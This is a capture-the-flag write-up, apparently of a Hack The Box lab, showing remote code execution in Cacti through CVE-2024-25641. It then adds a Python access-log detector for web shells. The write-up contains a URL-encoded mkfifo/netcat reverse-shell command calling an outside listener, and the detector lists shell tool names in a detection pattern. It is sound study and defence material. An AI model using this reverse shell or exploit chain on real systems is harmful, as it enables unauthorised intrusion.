CVE-2024-25641
The target Cacti instance has been identified as vulnerable to a remote code execution vulnerability, CVE-2024-25641. In the following sections, I will attempt to gain the initial foothold via RCE.
Import Packages is available under Import/Export
Loading the malicious package
Successfully imported the malicious package
Code execution confirmed
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.15.34%209999%20%3E%2Ftmp%2Ff
Sending the reverse shell command through the cmd parameter
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.178.64] 36538
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitorsthree:~/html/cacti/resource$ whoami
whoami
www-data
www-data@monitorsthree:~/html/cacti/resource$ hostname
hostname
monitorsthree
www-data@monitorsthree:~/html/cacti/resource$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:df:5f brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.178.64/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 1966sec preferred_lft 1966sec
3: br-c7b83e1b07b0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:94:ce:d0:f1 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-c7b83e1b07b0
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:d7:ee:27:62 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
6: veth275bc45@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c7b83e1b07b0 state UP group default
link/ether 62:f4:de:68:2f:e1 brd ff:ff:ff:ff:ff:ff link-netnsid 0
Initial foothold established on the target system as the www-data account via CVE-2024-25641
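
From the defender's side, the request carrying the cmd parameter above leaves a trace in the web server's access log. The following is an added detection example, not part of the original writeup: it decodes query strings and flags PHP requests under Cacti's resource/ directory, which is where the shell above lands. The log lines are constructed, webshell_placeholder.php is a placeholder file name, and the combined log format and the premise that PHP under resource/ is not requested in normal use are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in "combined" format (not taken from the target).
# webshell_placeholder.php is a placeholder; the writeup does not name the file.
SAMPLE_LOG = [
    '10.10.15.34 - - [01/Jan/2025:10:00:01 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 5120',
    '10.10.15.34 - - [01/Jan/2025:10:02:13 +0000] "GET /cacti/resource/webshell_placeholder.php?cmd=id HTTP/1.1" 200 54',
    '10.10.15.34 - - [01/Jan/2025:10:03:40 +0000] "GET /cacti/resource/webshell_placeholder.php?cmd='
    'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.15.34%209999%20%3E%2Ftmp%2Ff'
    ' HTTP/1.1" 200 0',
    '10.0.0.7 - - [01/Jan/2025:10:05:00 +0000] "GET /cacti/resource/snmp_queries/interface.xml HTTP/1.1" 200 900',
]

REQ = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Shell metacharacters: command chaining, pipes, redirection, substitution.
SHELL_META = re.compile(r'[;|`<>]|\$\(|&&')
# Common command names appearing as whole words in a decoded parameter value.
SHELL_WORDS = re.compile(r'(?<![\w-])(?:mkfifo|nc|ncat|bash|sh|curl|wget|whoami|id|uname)(?![\w-])')

def suspicious_requests(lines, script_dir="/cacti/resource/"):
    """Return one finding per request that executes PHP from script_dir."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not a parseable request line
        src, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if not (url.path.startswith(script_dir) and url.path.endswith(".php")):
            continue
        # parse_qsl percent-decodes values, so encoded payloads are matched in clear.
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        severity = "review"  # PHP in resource/ with no shell-like parameter
        for value in params.values():
            if SHELL_META.search(value):
                severity = "high"
                break
            if SHELL_WORDS.search(value):
                severity = "medium"
        findings.append({"src": src, "time": ts, "path": url.path,
                         "status": status, "params": params, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f["severity"], f["src"], f["path"], f["params"])
```
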